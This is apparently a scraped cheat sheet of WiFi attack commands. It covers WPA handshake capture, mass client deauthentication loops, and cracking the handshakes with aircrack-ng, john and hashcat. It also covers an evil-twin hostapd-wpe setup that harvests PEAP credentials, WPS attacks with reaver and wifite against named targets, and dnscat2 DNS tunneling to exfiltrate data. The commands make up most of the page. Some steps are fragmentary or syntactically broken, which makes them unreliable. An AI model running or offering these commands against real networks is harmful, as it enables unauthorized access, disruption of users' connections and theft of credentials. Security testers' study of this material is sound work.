Skip to content



  1. Capture Handshake using airodump-ng
  2. Crack it locally using john or hashcat

1. Monitor mode

sudo airmon-ng start wlan0

2. Listen for specific bssid

sudo airodump-ng -a mon0

find you target bssid (mac) and chanel

airodump-ng -c <channel> --bssid <MAC-BOX-CLIENT> --showack -w capture mon0

don't forget the -w paramter to save the handshake !


# DEAUTH all clients from a box
aireplay-ng mon0 -0 5 -b <MAC-BOX>

# DEAUTH specific client device
aireplay-ng mon0 -0 5 -a <MAC-BOX> -c <MAC-DEVICE-CLIENT> 

# DEAUTH massif (each client connected at each bssid of an essid)
for bssid in cat bssid_deauth.lst; do for mac in cat client_deauth.lst; do aireplay-ng mon.wlan0 -0 5 -a $bssid -c $mac --ignore-negative-one -e <ESSID_CLIENT> ; done ; done

4. Handshake cracking

Handshaked captured ? go crack it !

Crack with aircrack

aircrack-ng capture-01.cap --wordlist=<wordlist>

Crack with john

wpaclean capture.cap-01.clean.cap capture.cap-01.cap
aircrack-ng capture.cap-01.clean.cap -J capture.cap-01.hccap
hccap2john capture.cap-01.hccap > capture.cap-01.hccap.john
john --wordlist=<wordlist> capture.cap-01.hccap.john

Crack with hashcat



  1. sudo apt install hostapd-wpe
  2. Configure same channel and essid than the client's one in hostapd conf
  3. Disconnect clients devices (see WPA - 3. DeAUTH)

Log PEAP : hash client format john

cat peap_client_log.txt | grep username -A2 | sed '/^--/d' | awk '{print $2}' | tr -d ':' | awk 'NR%3{printf $0":";next;}1' | awk -F ':' '{print $1"::::"$3":"$2}'

Vulnerability fix : GPO validate certificate

Captive portal

DNS tunneling

Try DNS tunneling to exfiltrate data over the internet

git clone
cd dnscat2/server/
bundle install


unblock wifi card

sudo nmcli nm wifi off
sudo nmcli radio wifi off
sudo rfkill unblock wlan


PEAP hash replay

mise en place du proxy local

ssh rssh@ -p 9000 -D 9010 -N -i rssh.ssh


airmon-ng check airmon-ng start wlan1 
wifite --showb --wpa --mon-iface wlan0mo 
airodump-ng -a wlan1mon --wps --essid-regex EDL time reaver -i wlan1mon -c 1 -b E8:FC:AF:9A:C9:B0 -K 1 
airodump-ng -a wlan1mon --essid-regex Internet 
wifite --showb --wpa --mon-iface wlan0mon --aircrack --pyrit --tshark --cowpatty --power 40
airmon-ng check airmon-ng start wlan0 
airodump-ng wlan0mon --wps --essid-regex VICTIM reaver -i wlan0mon -c $channel -b $bssid -K 1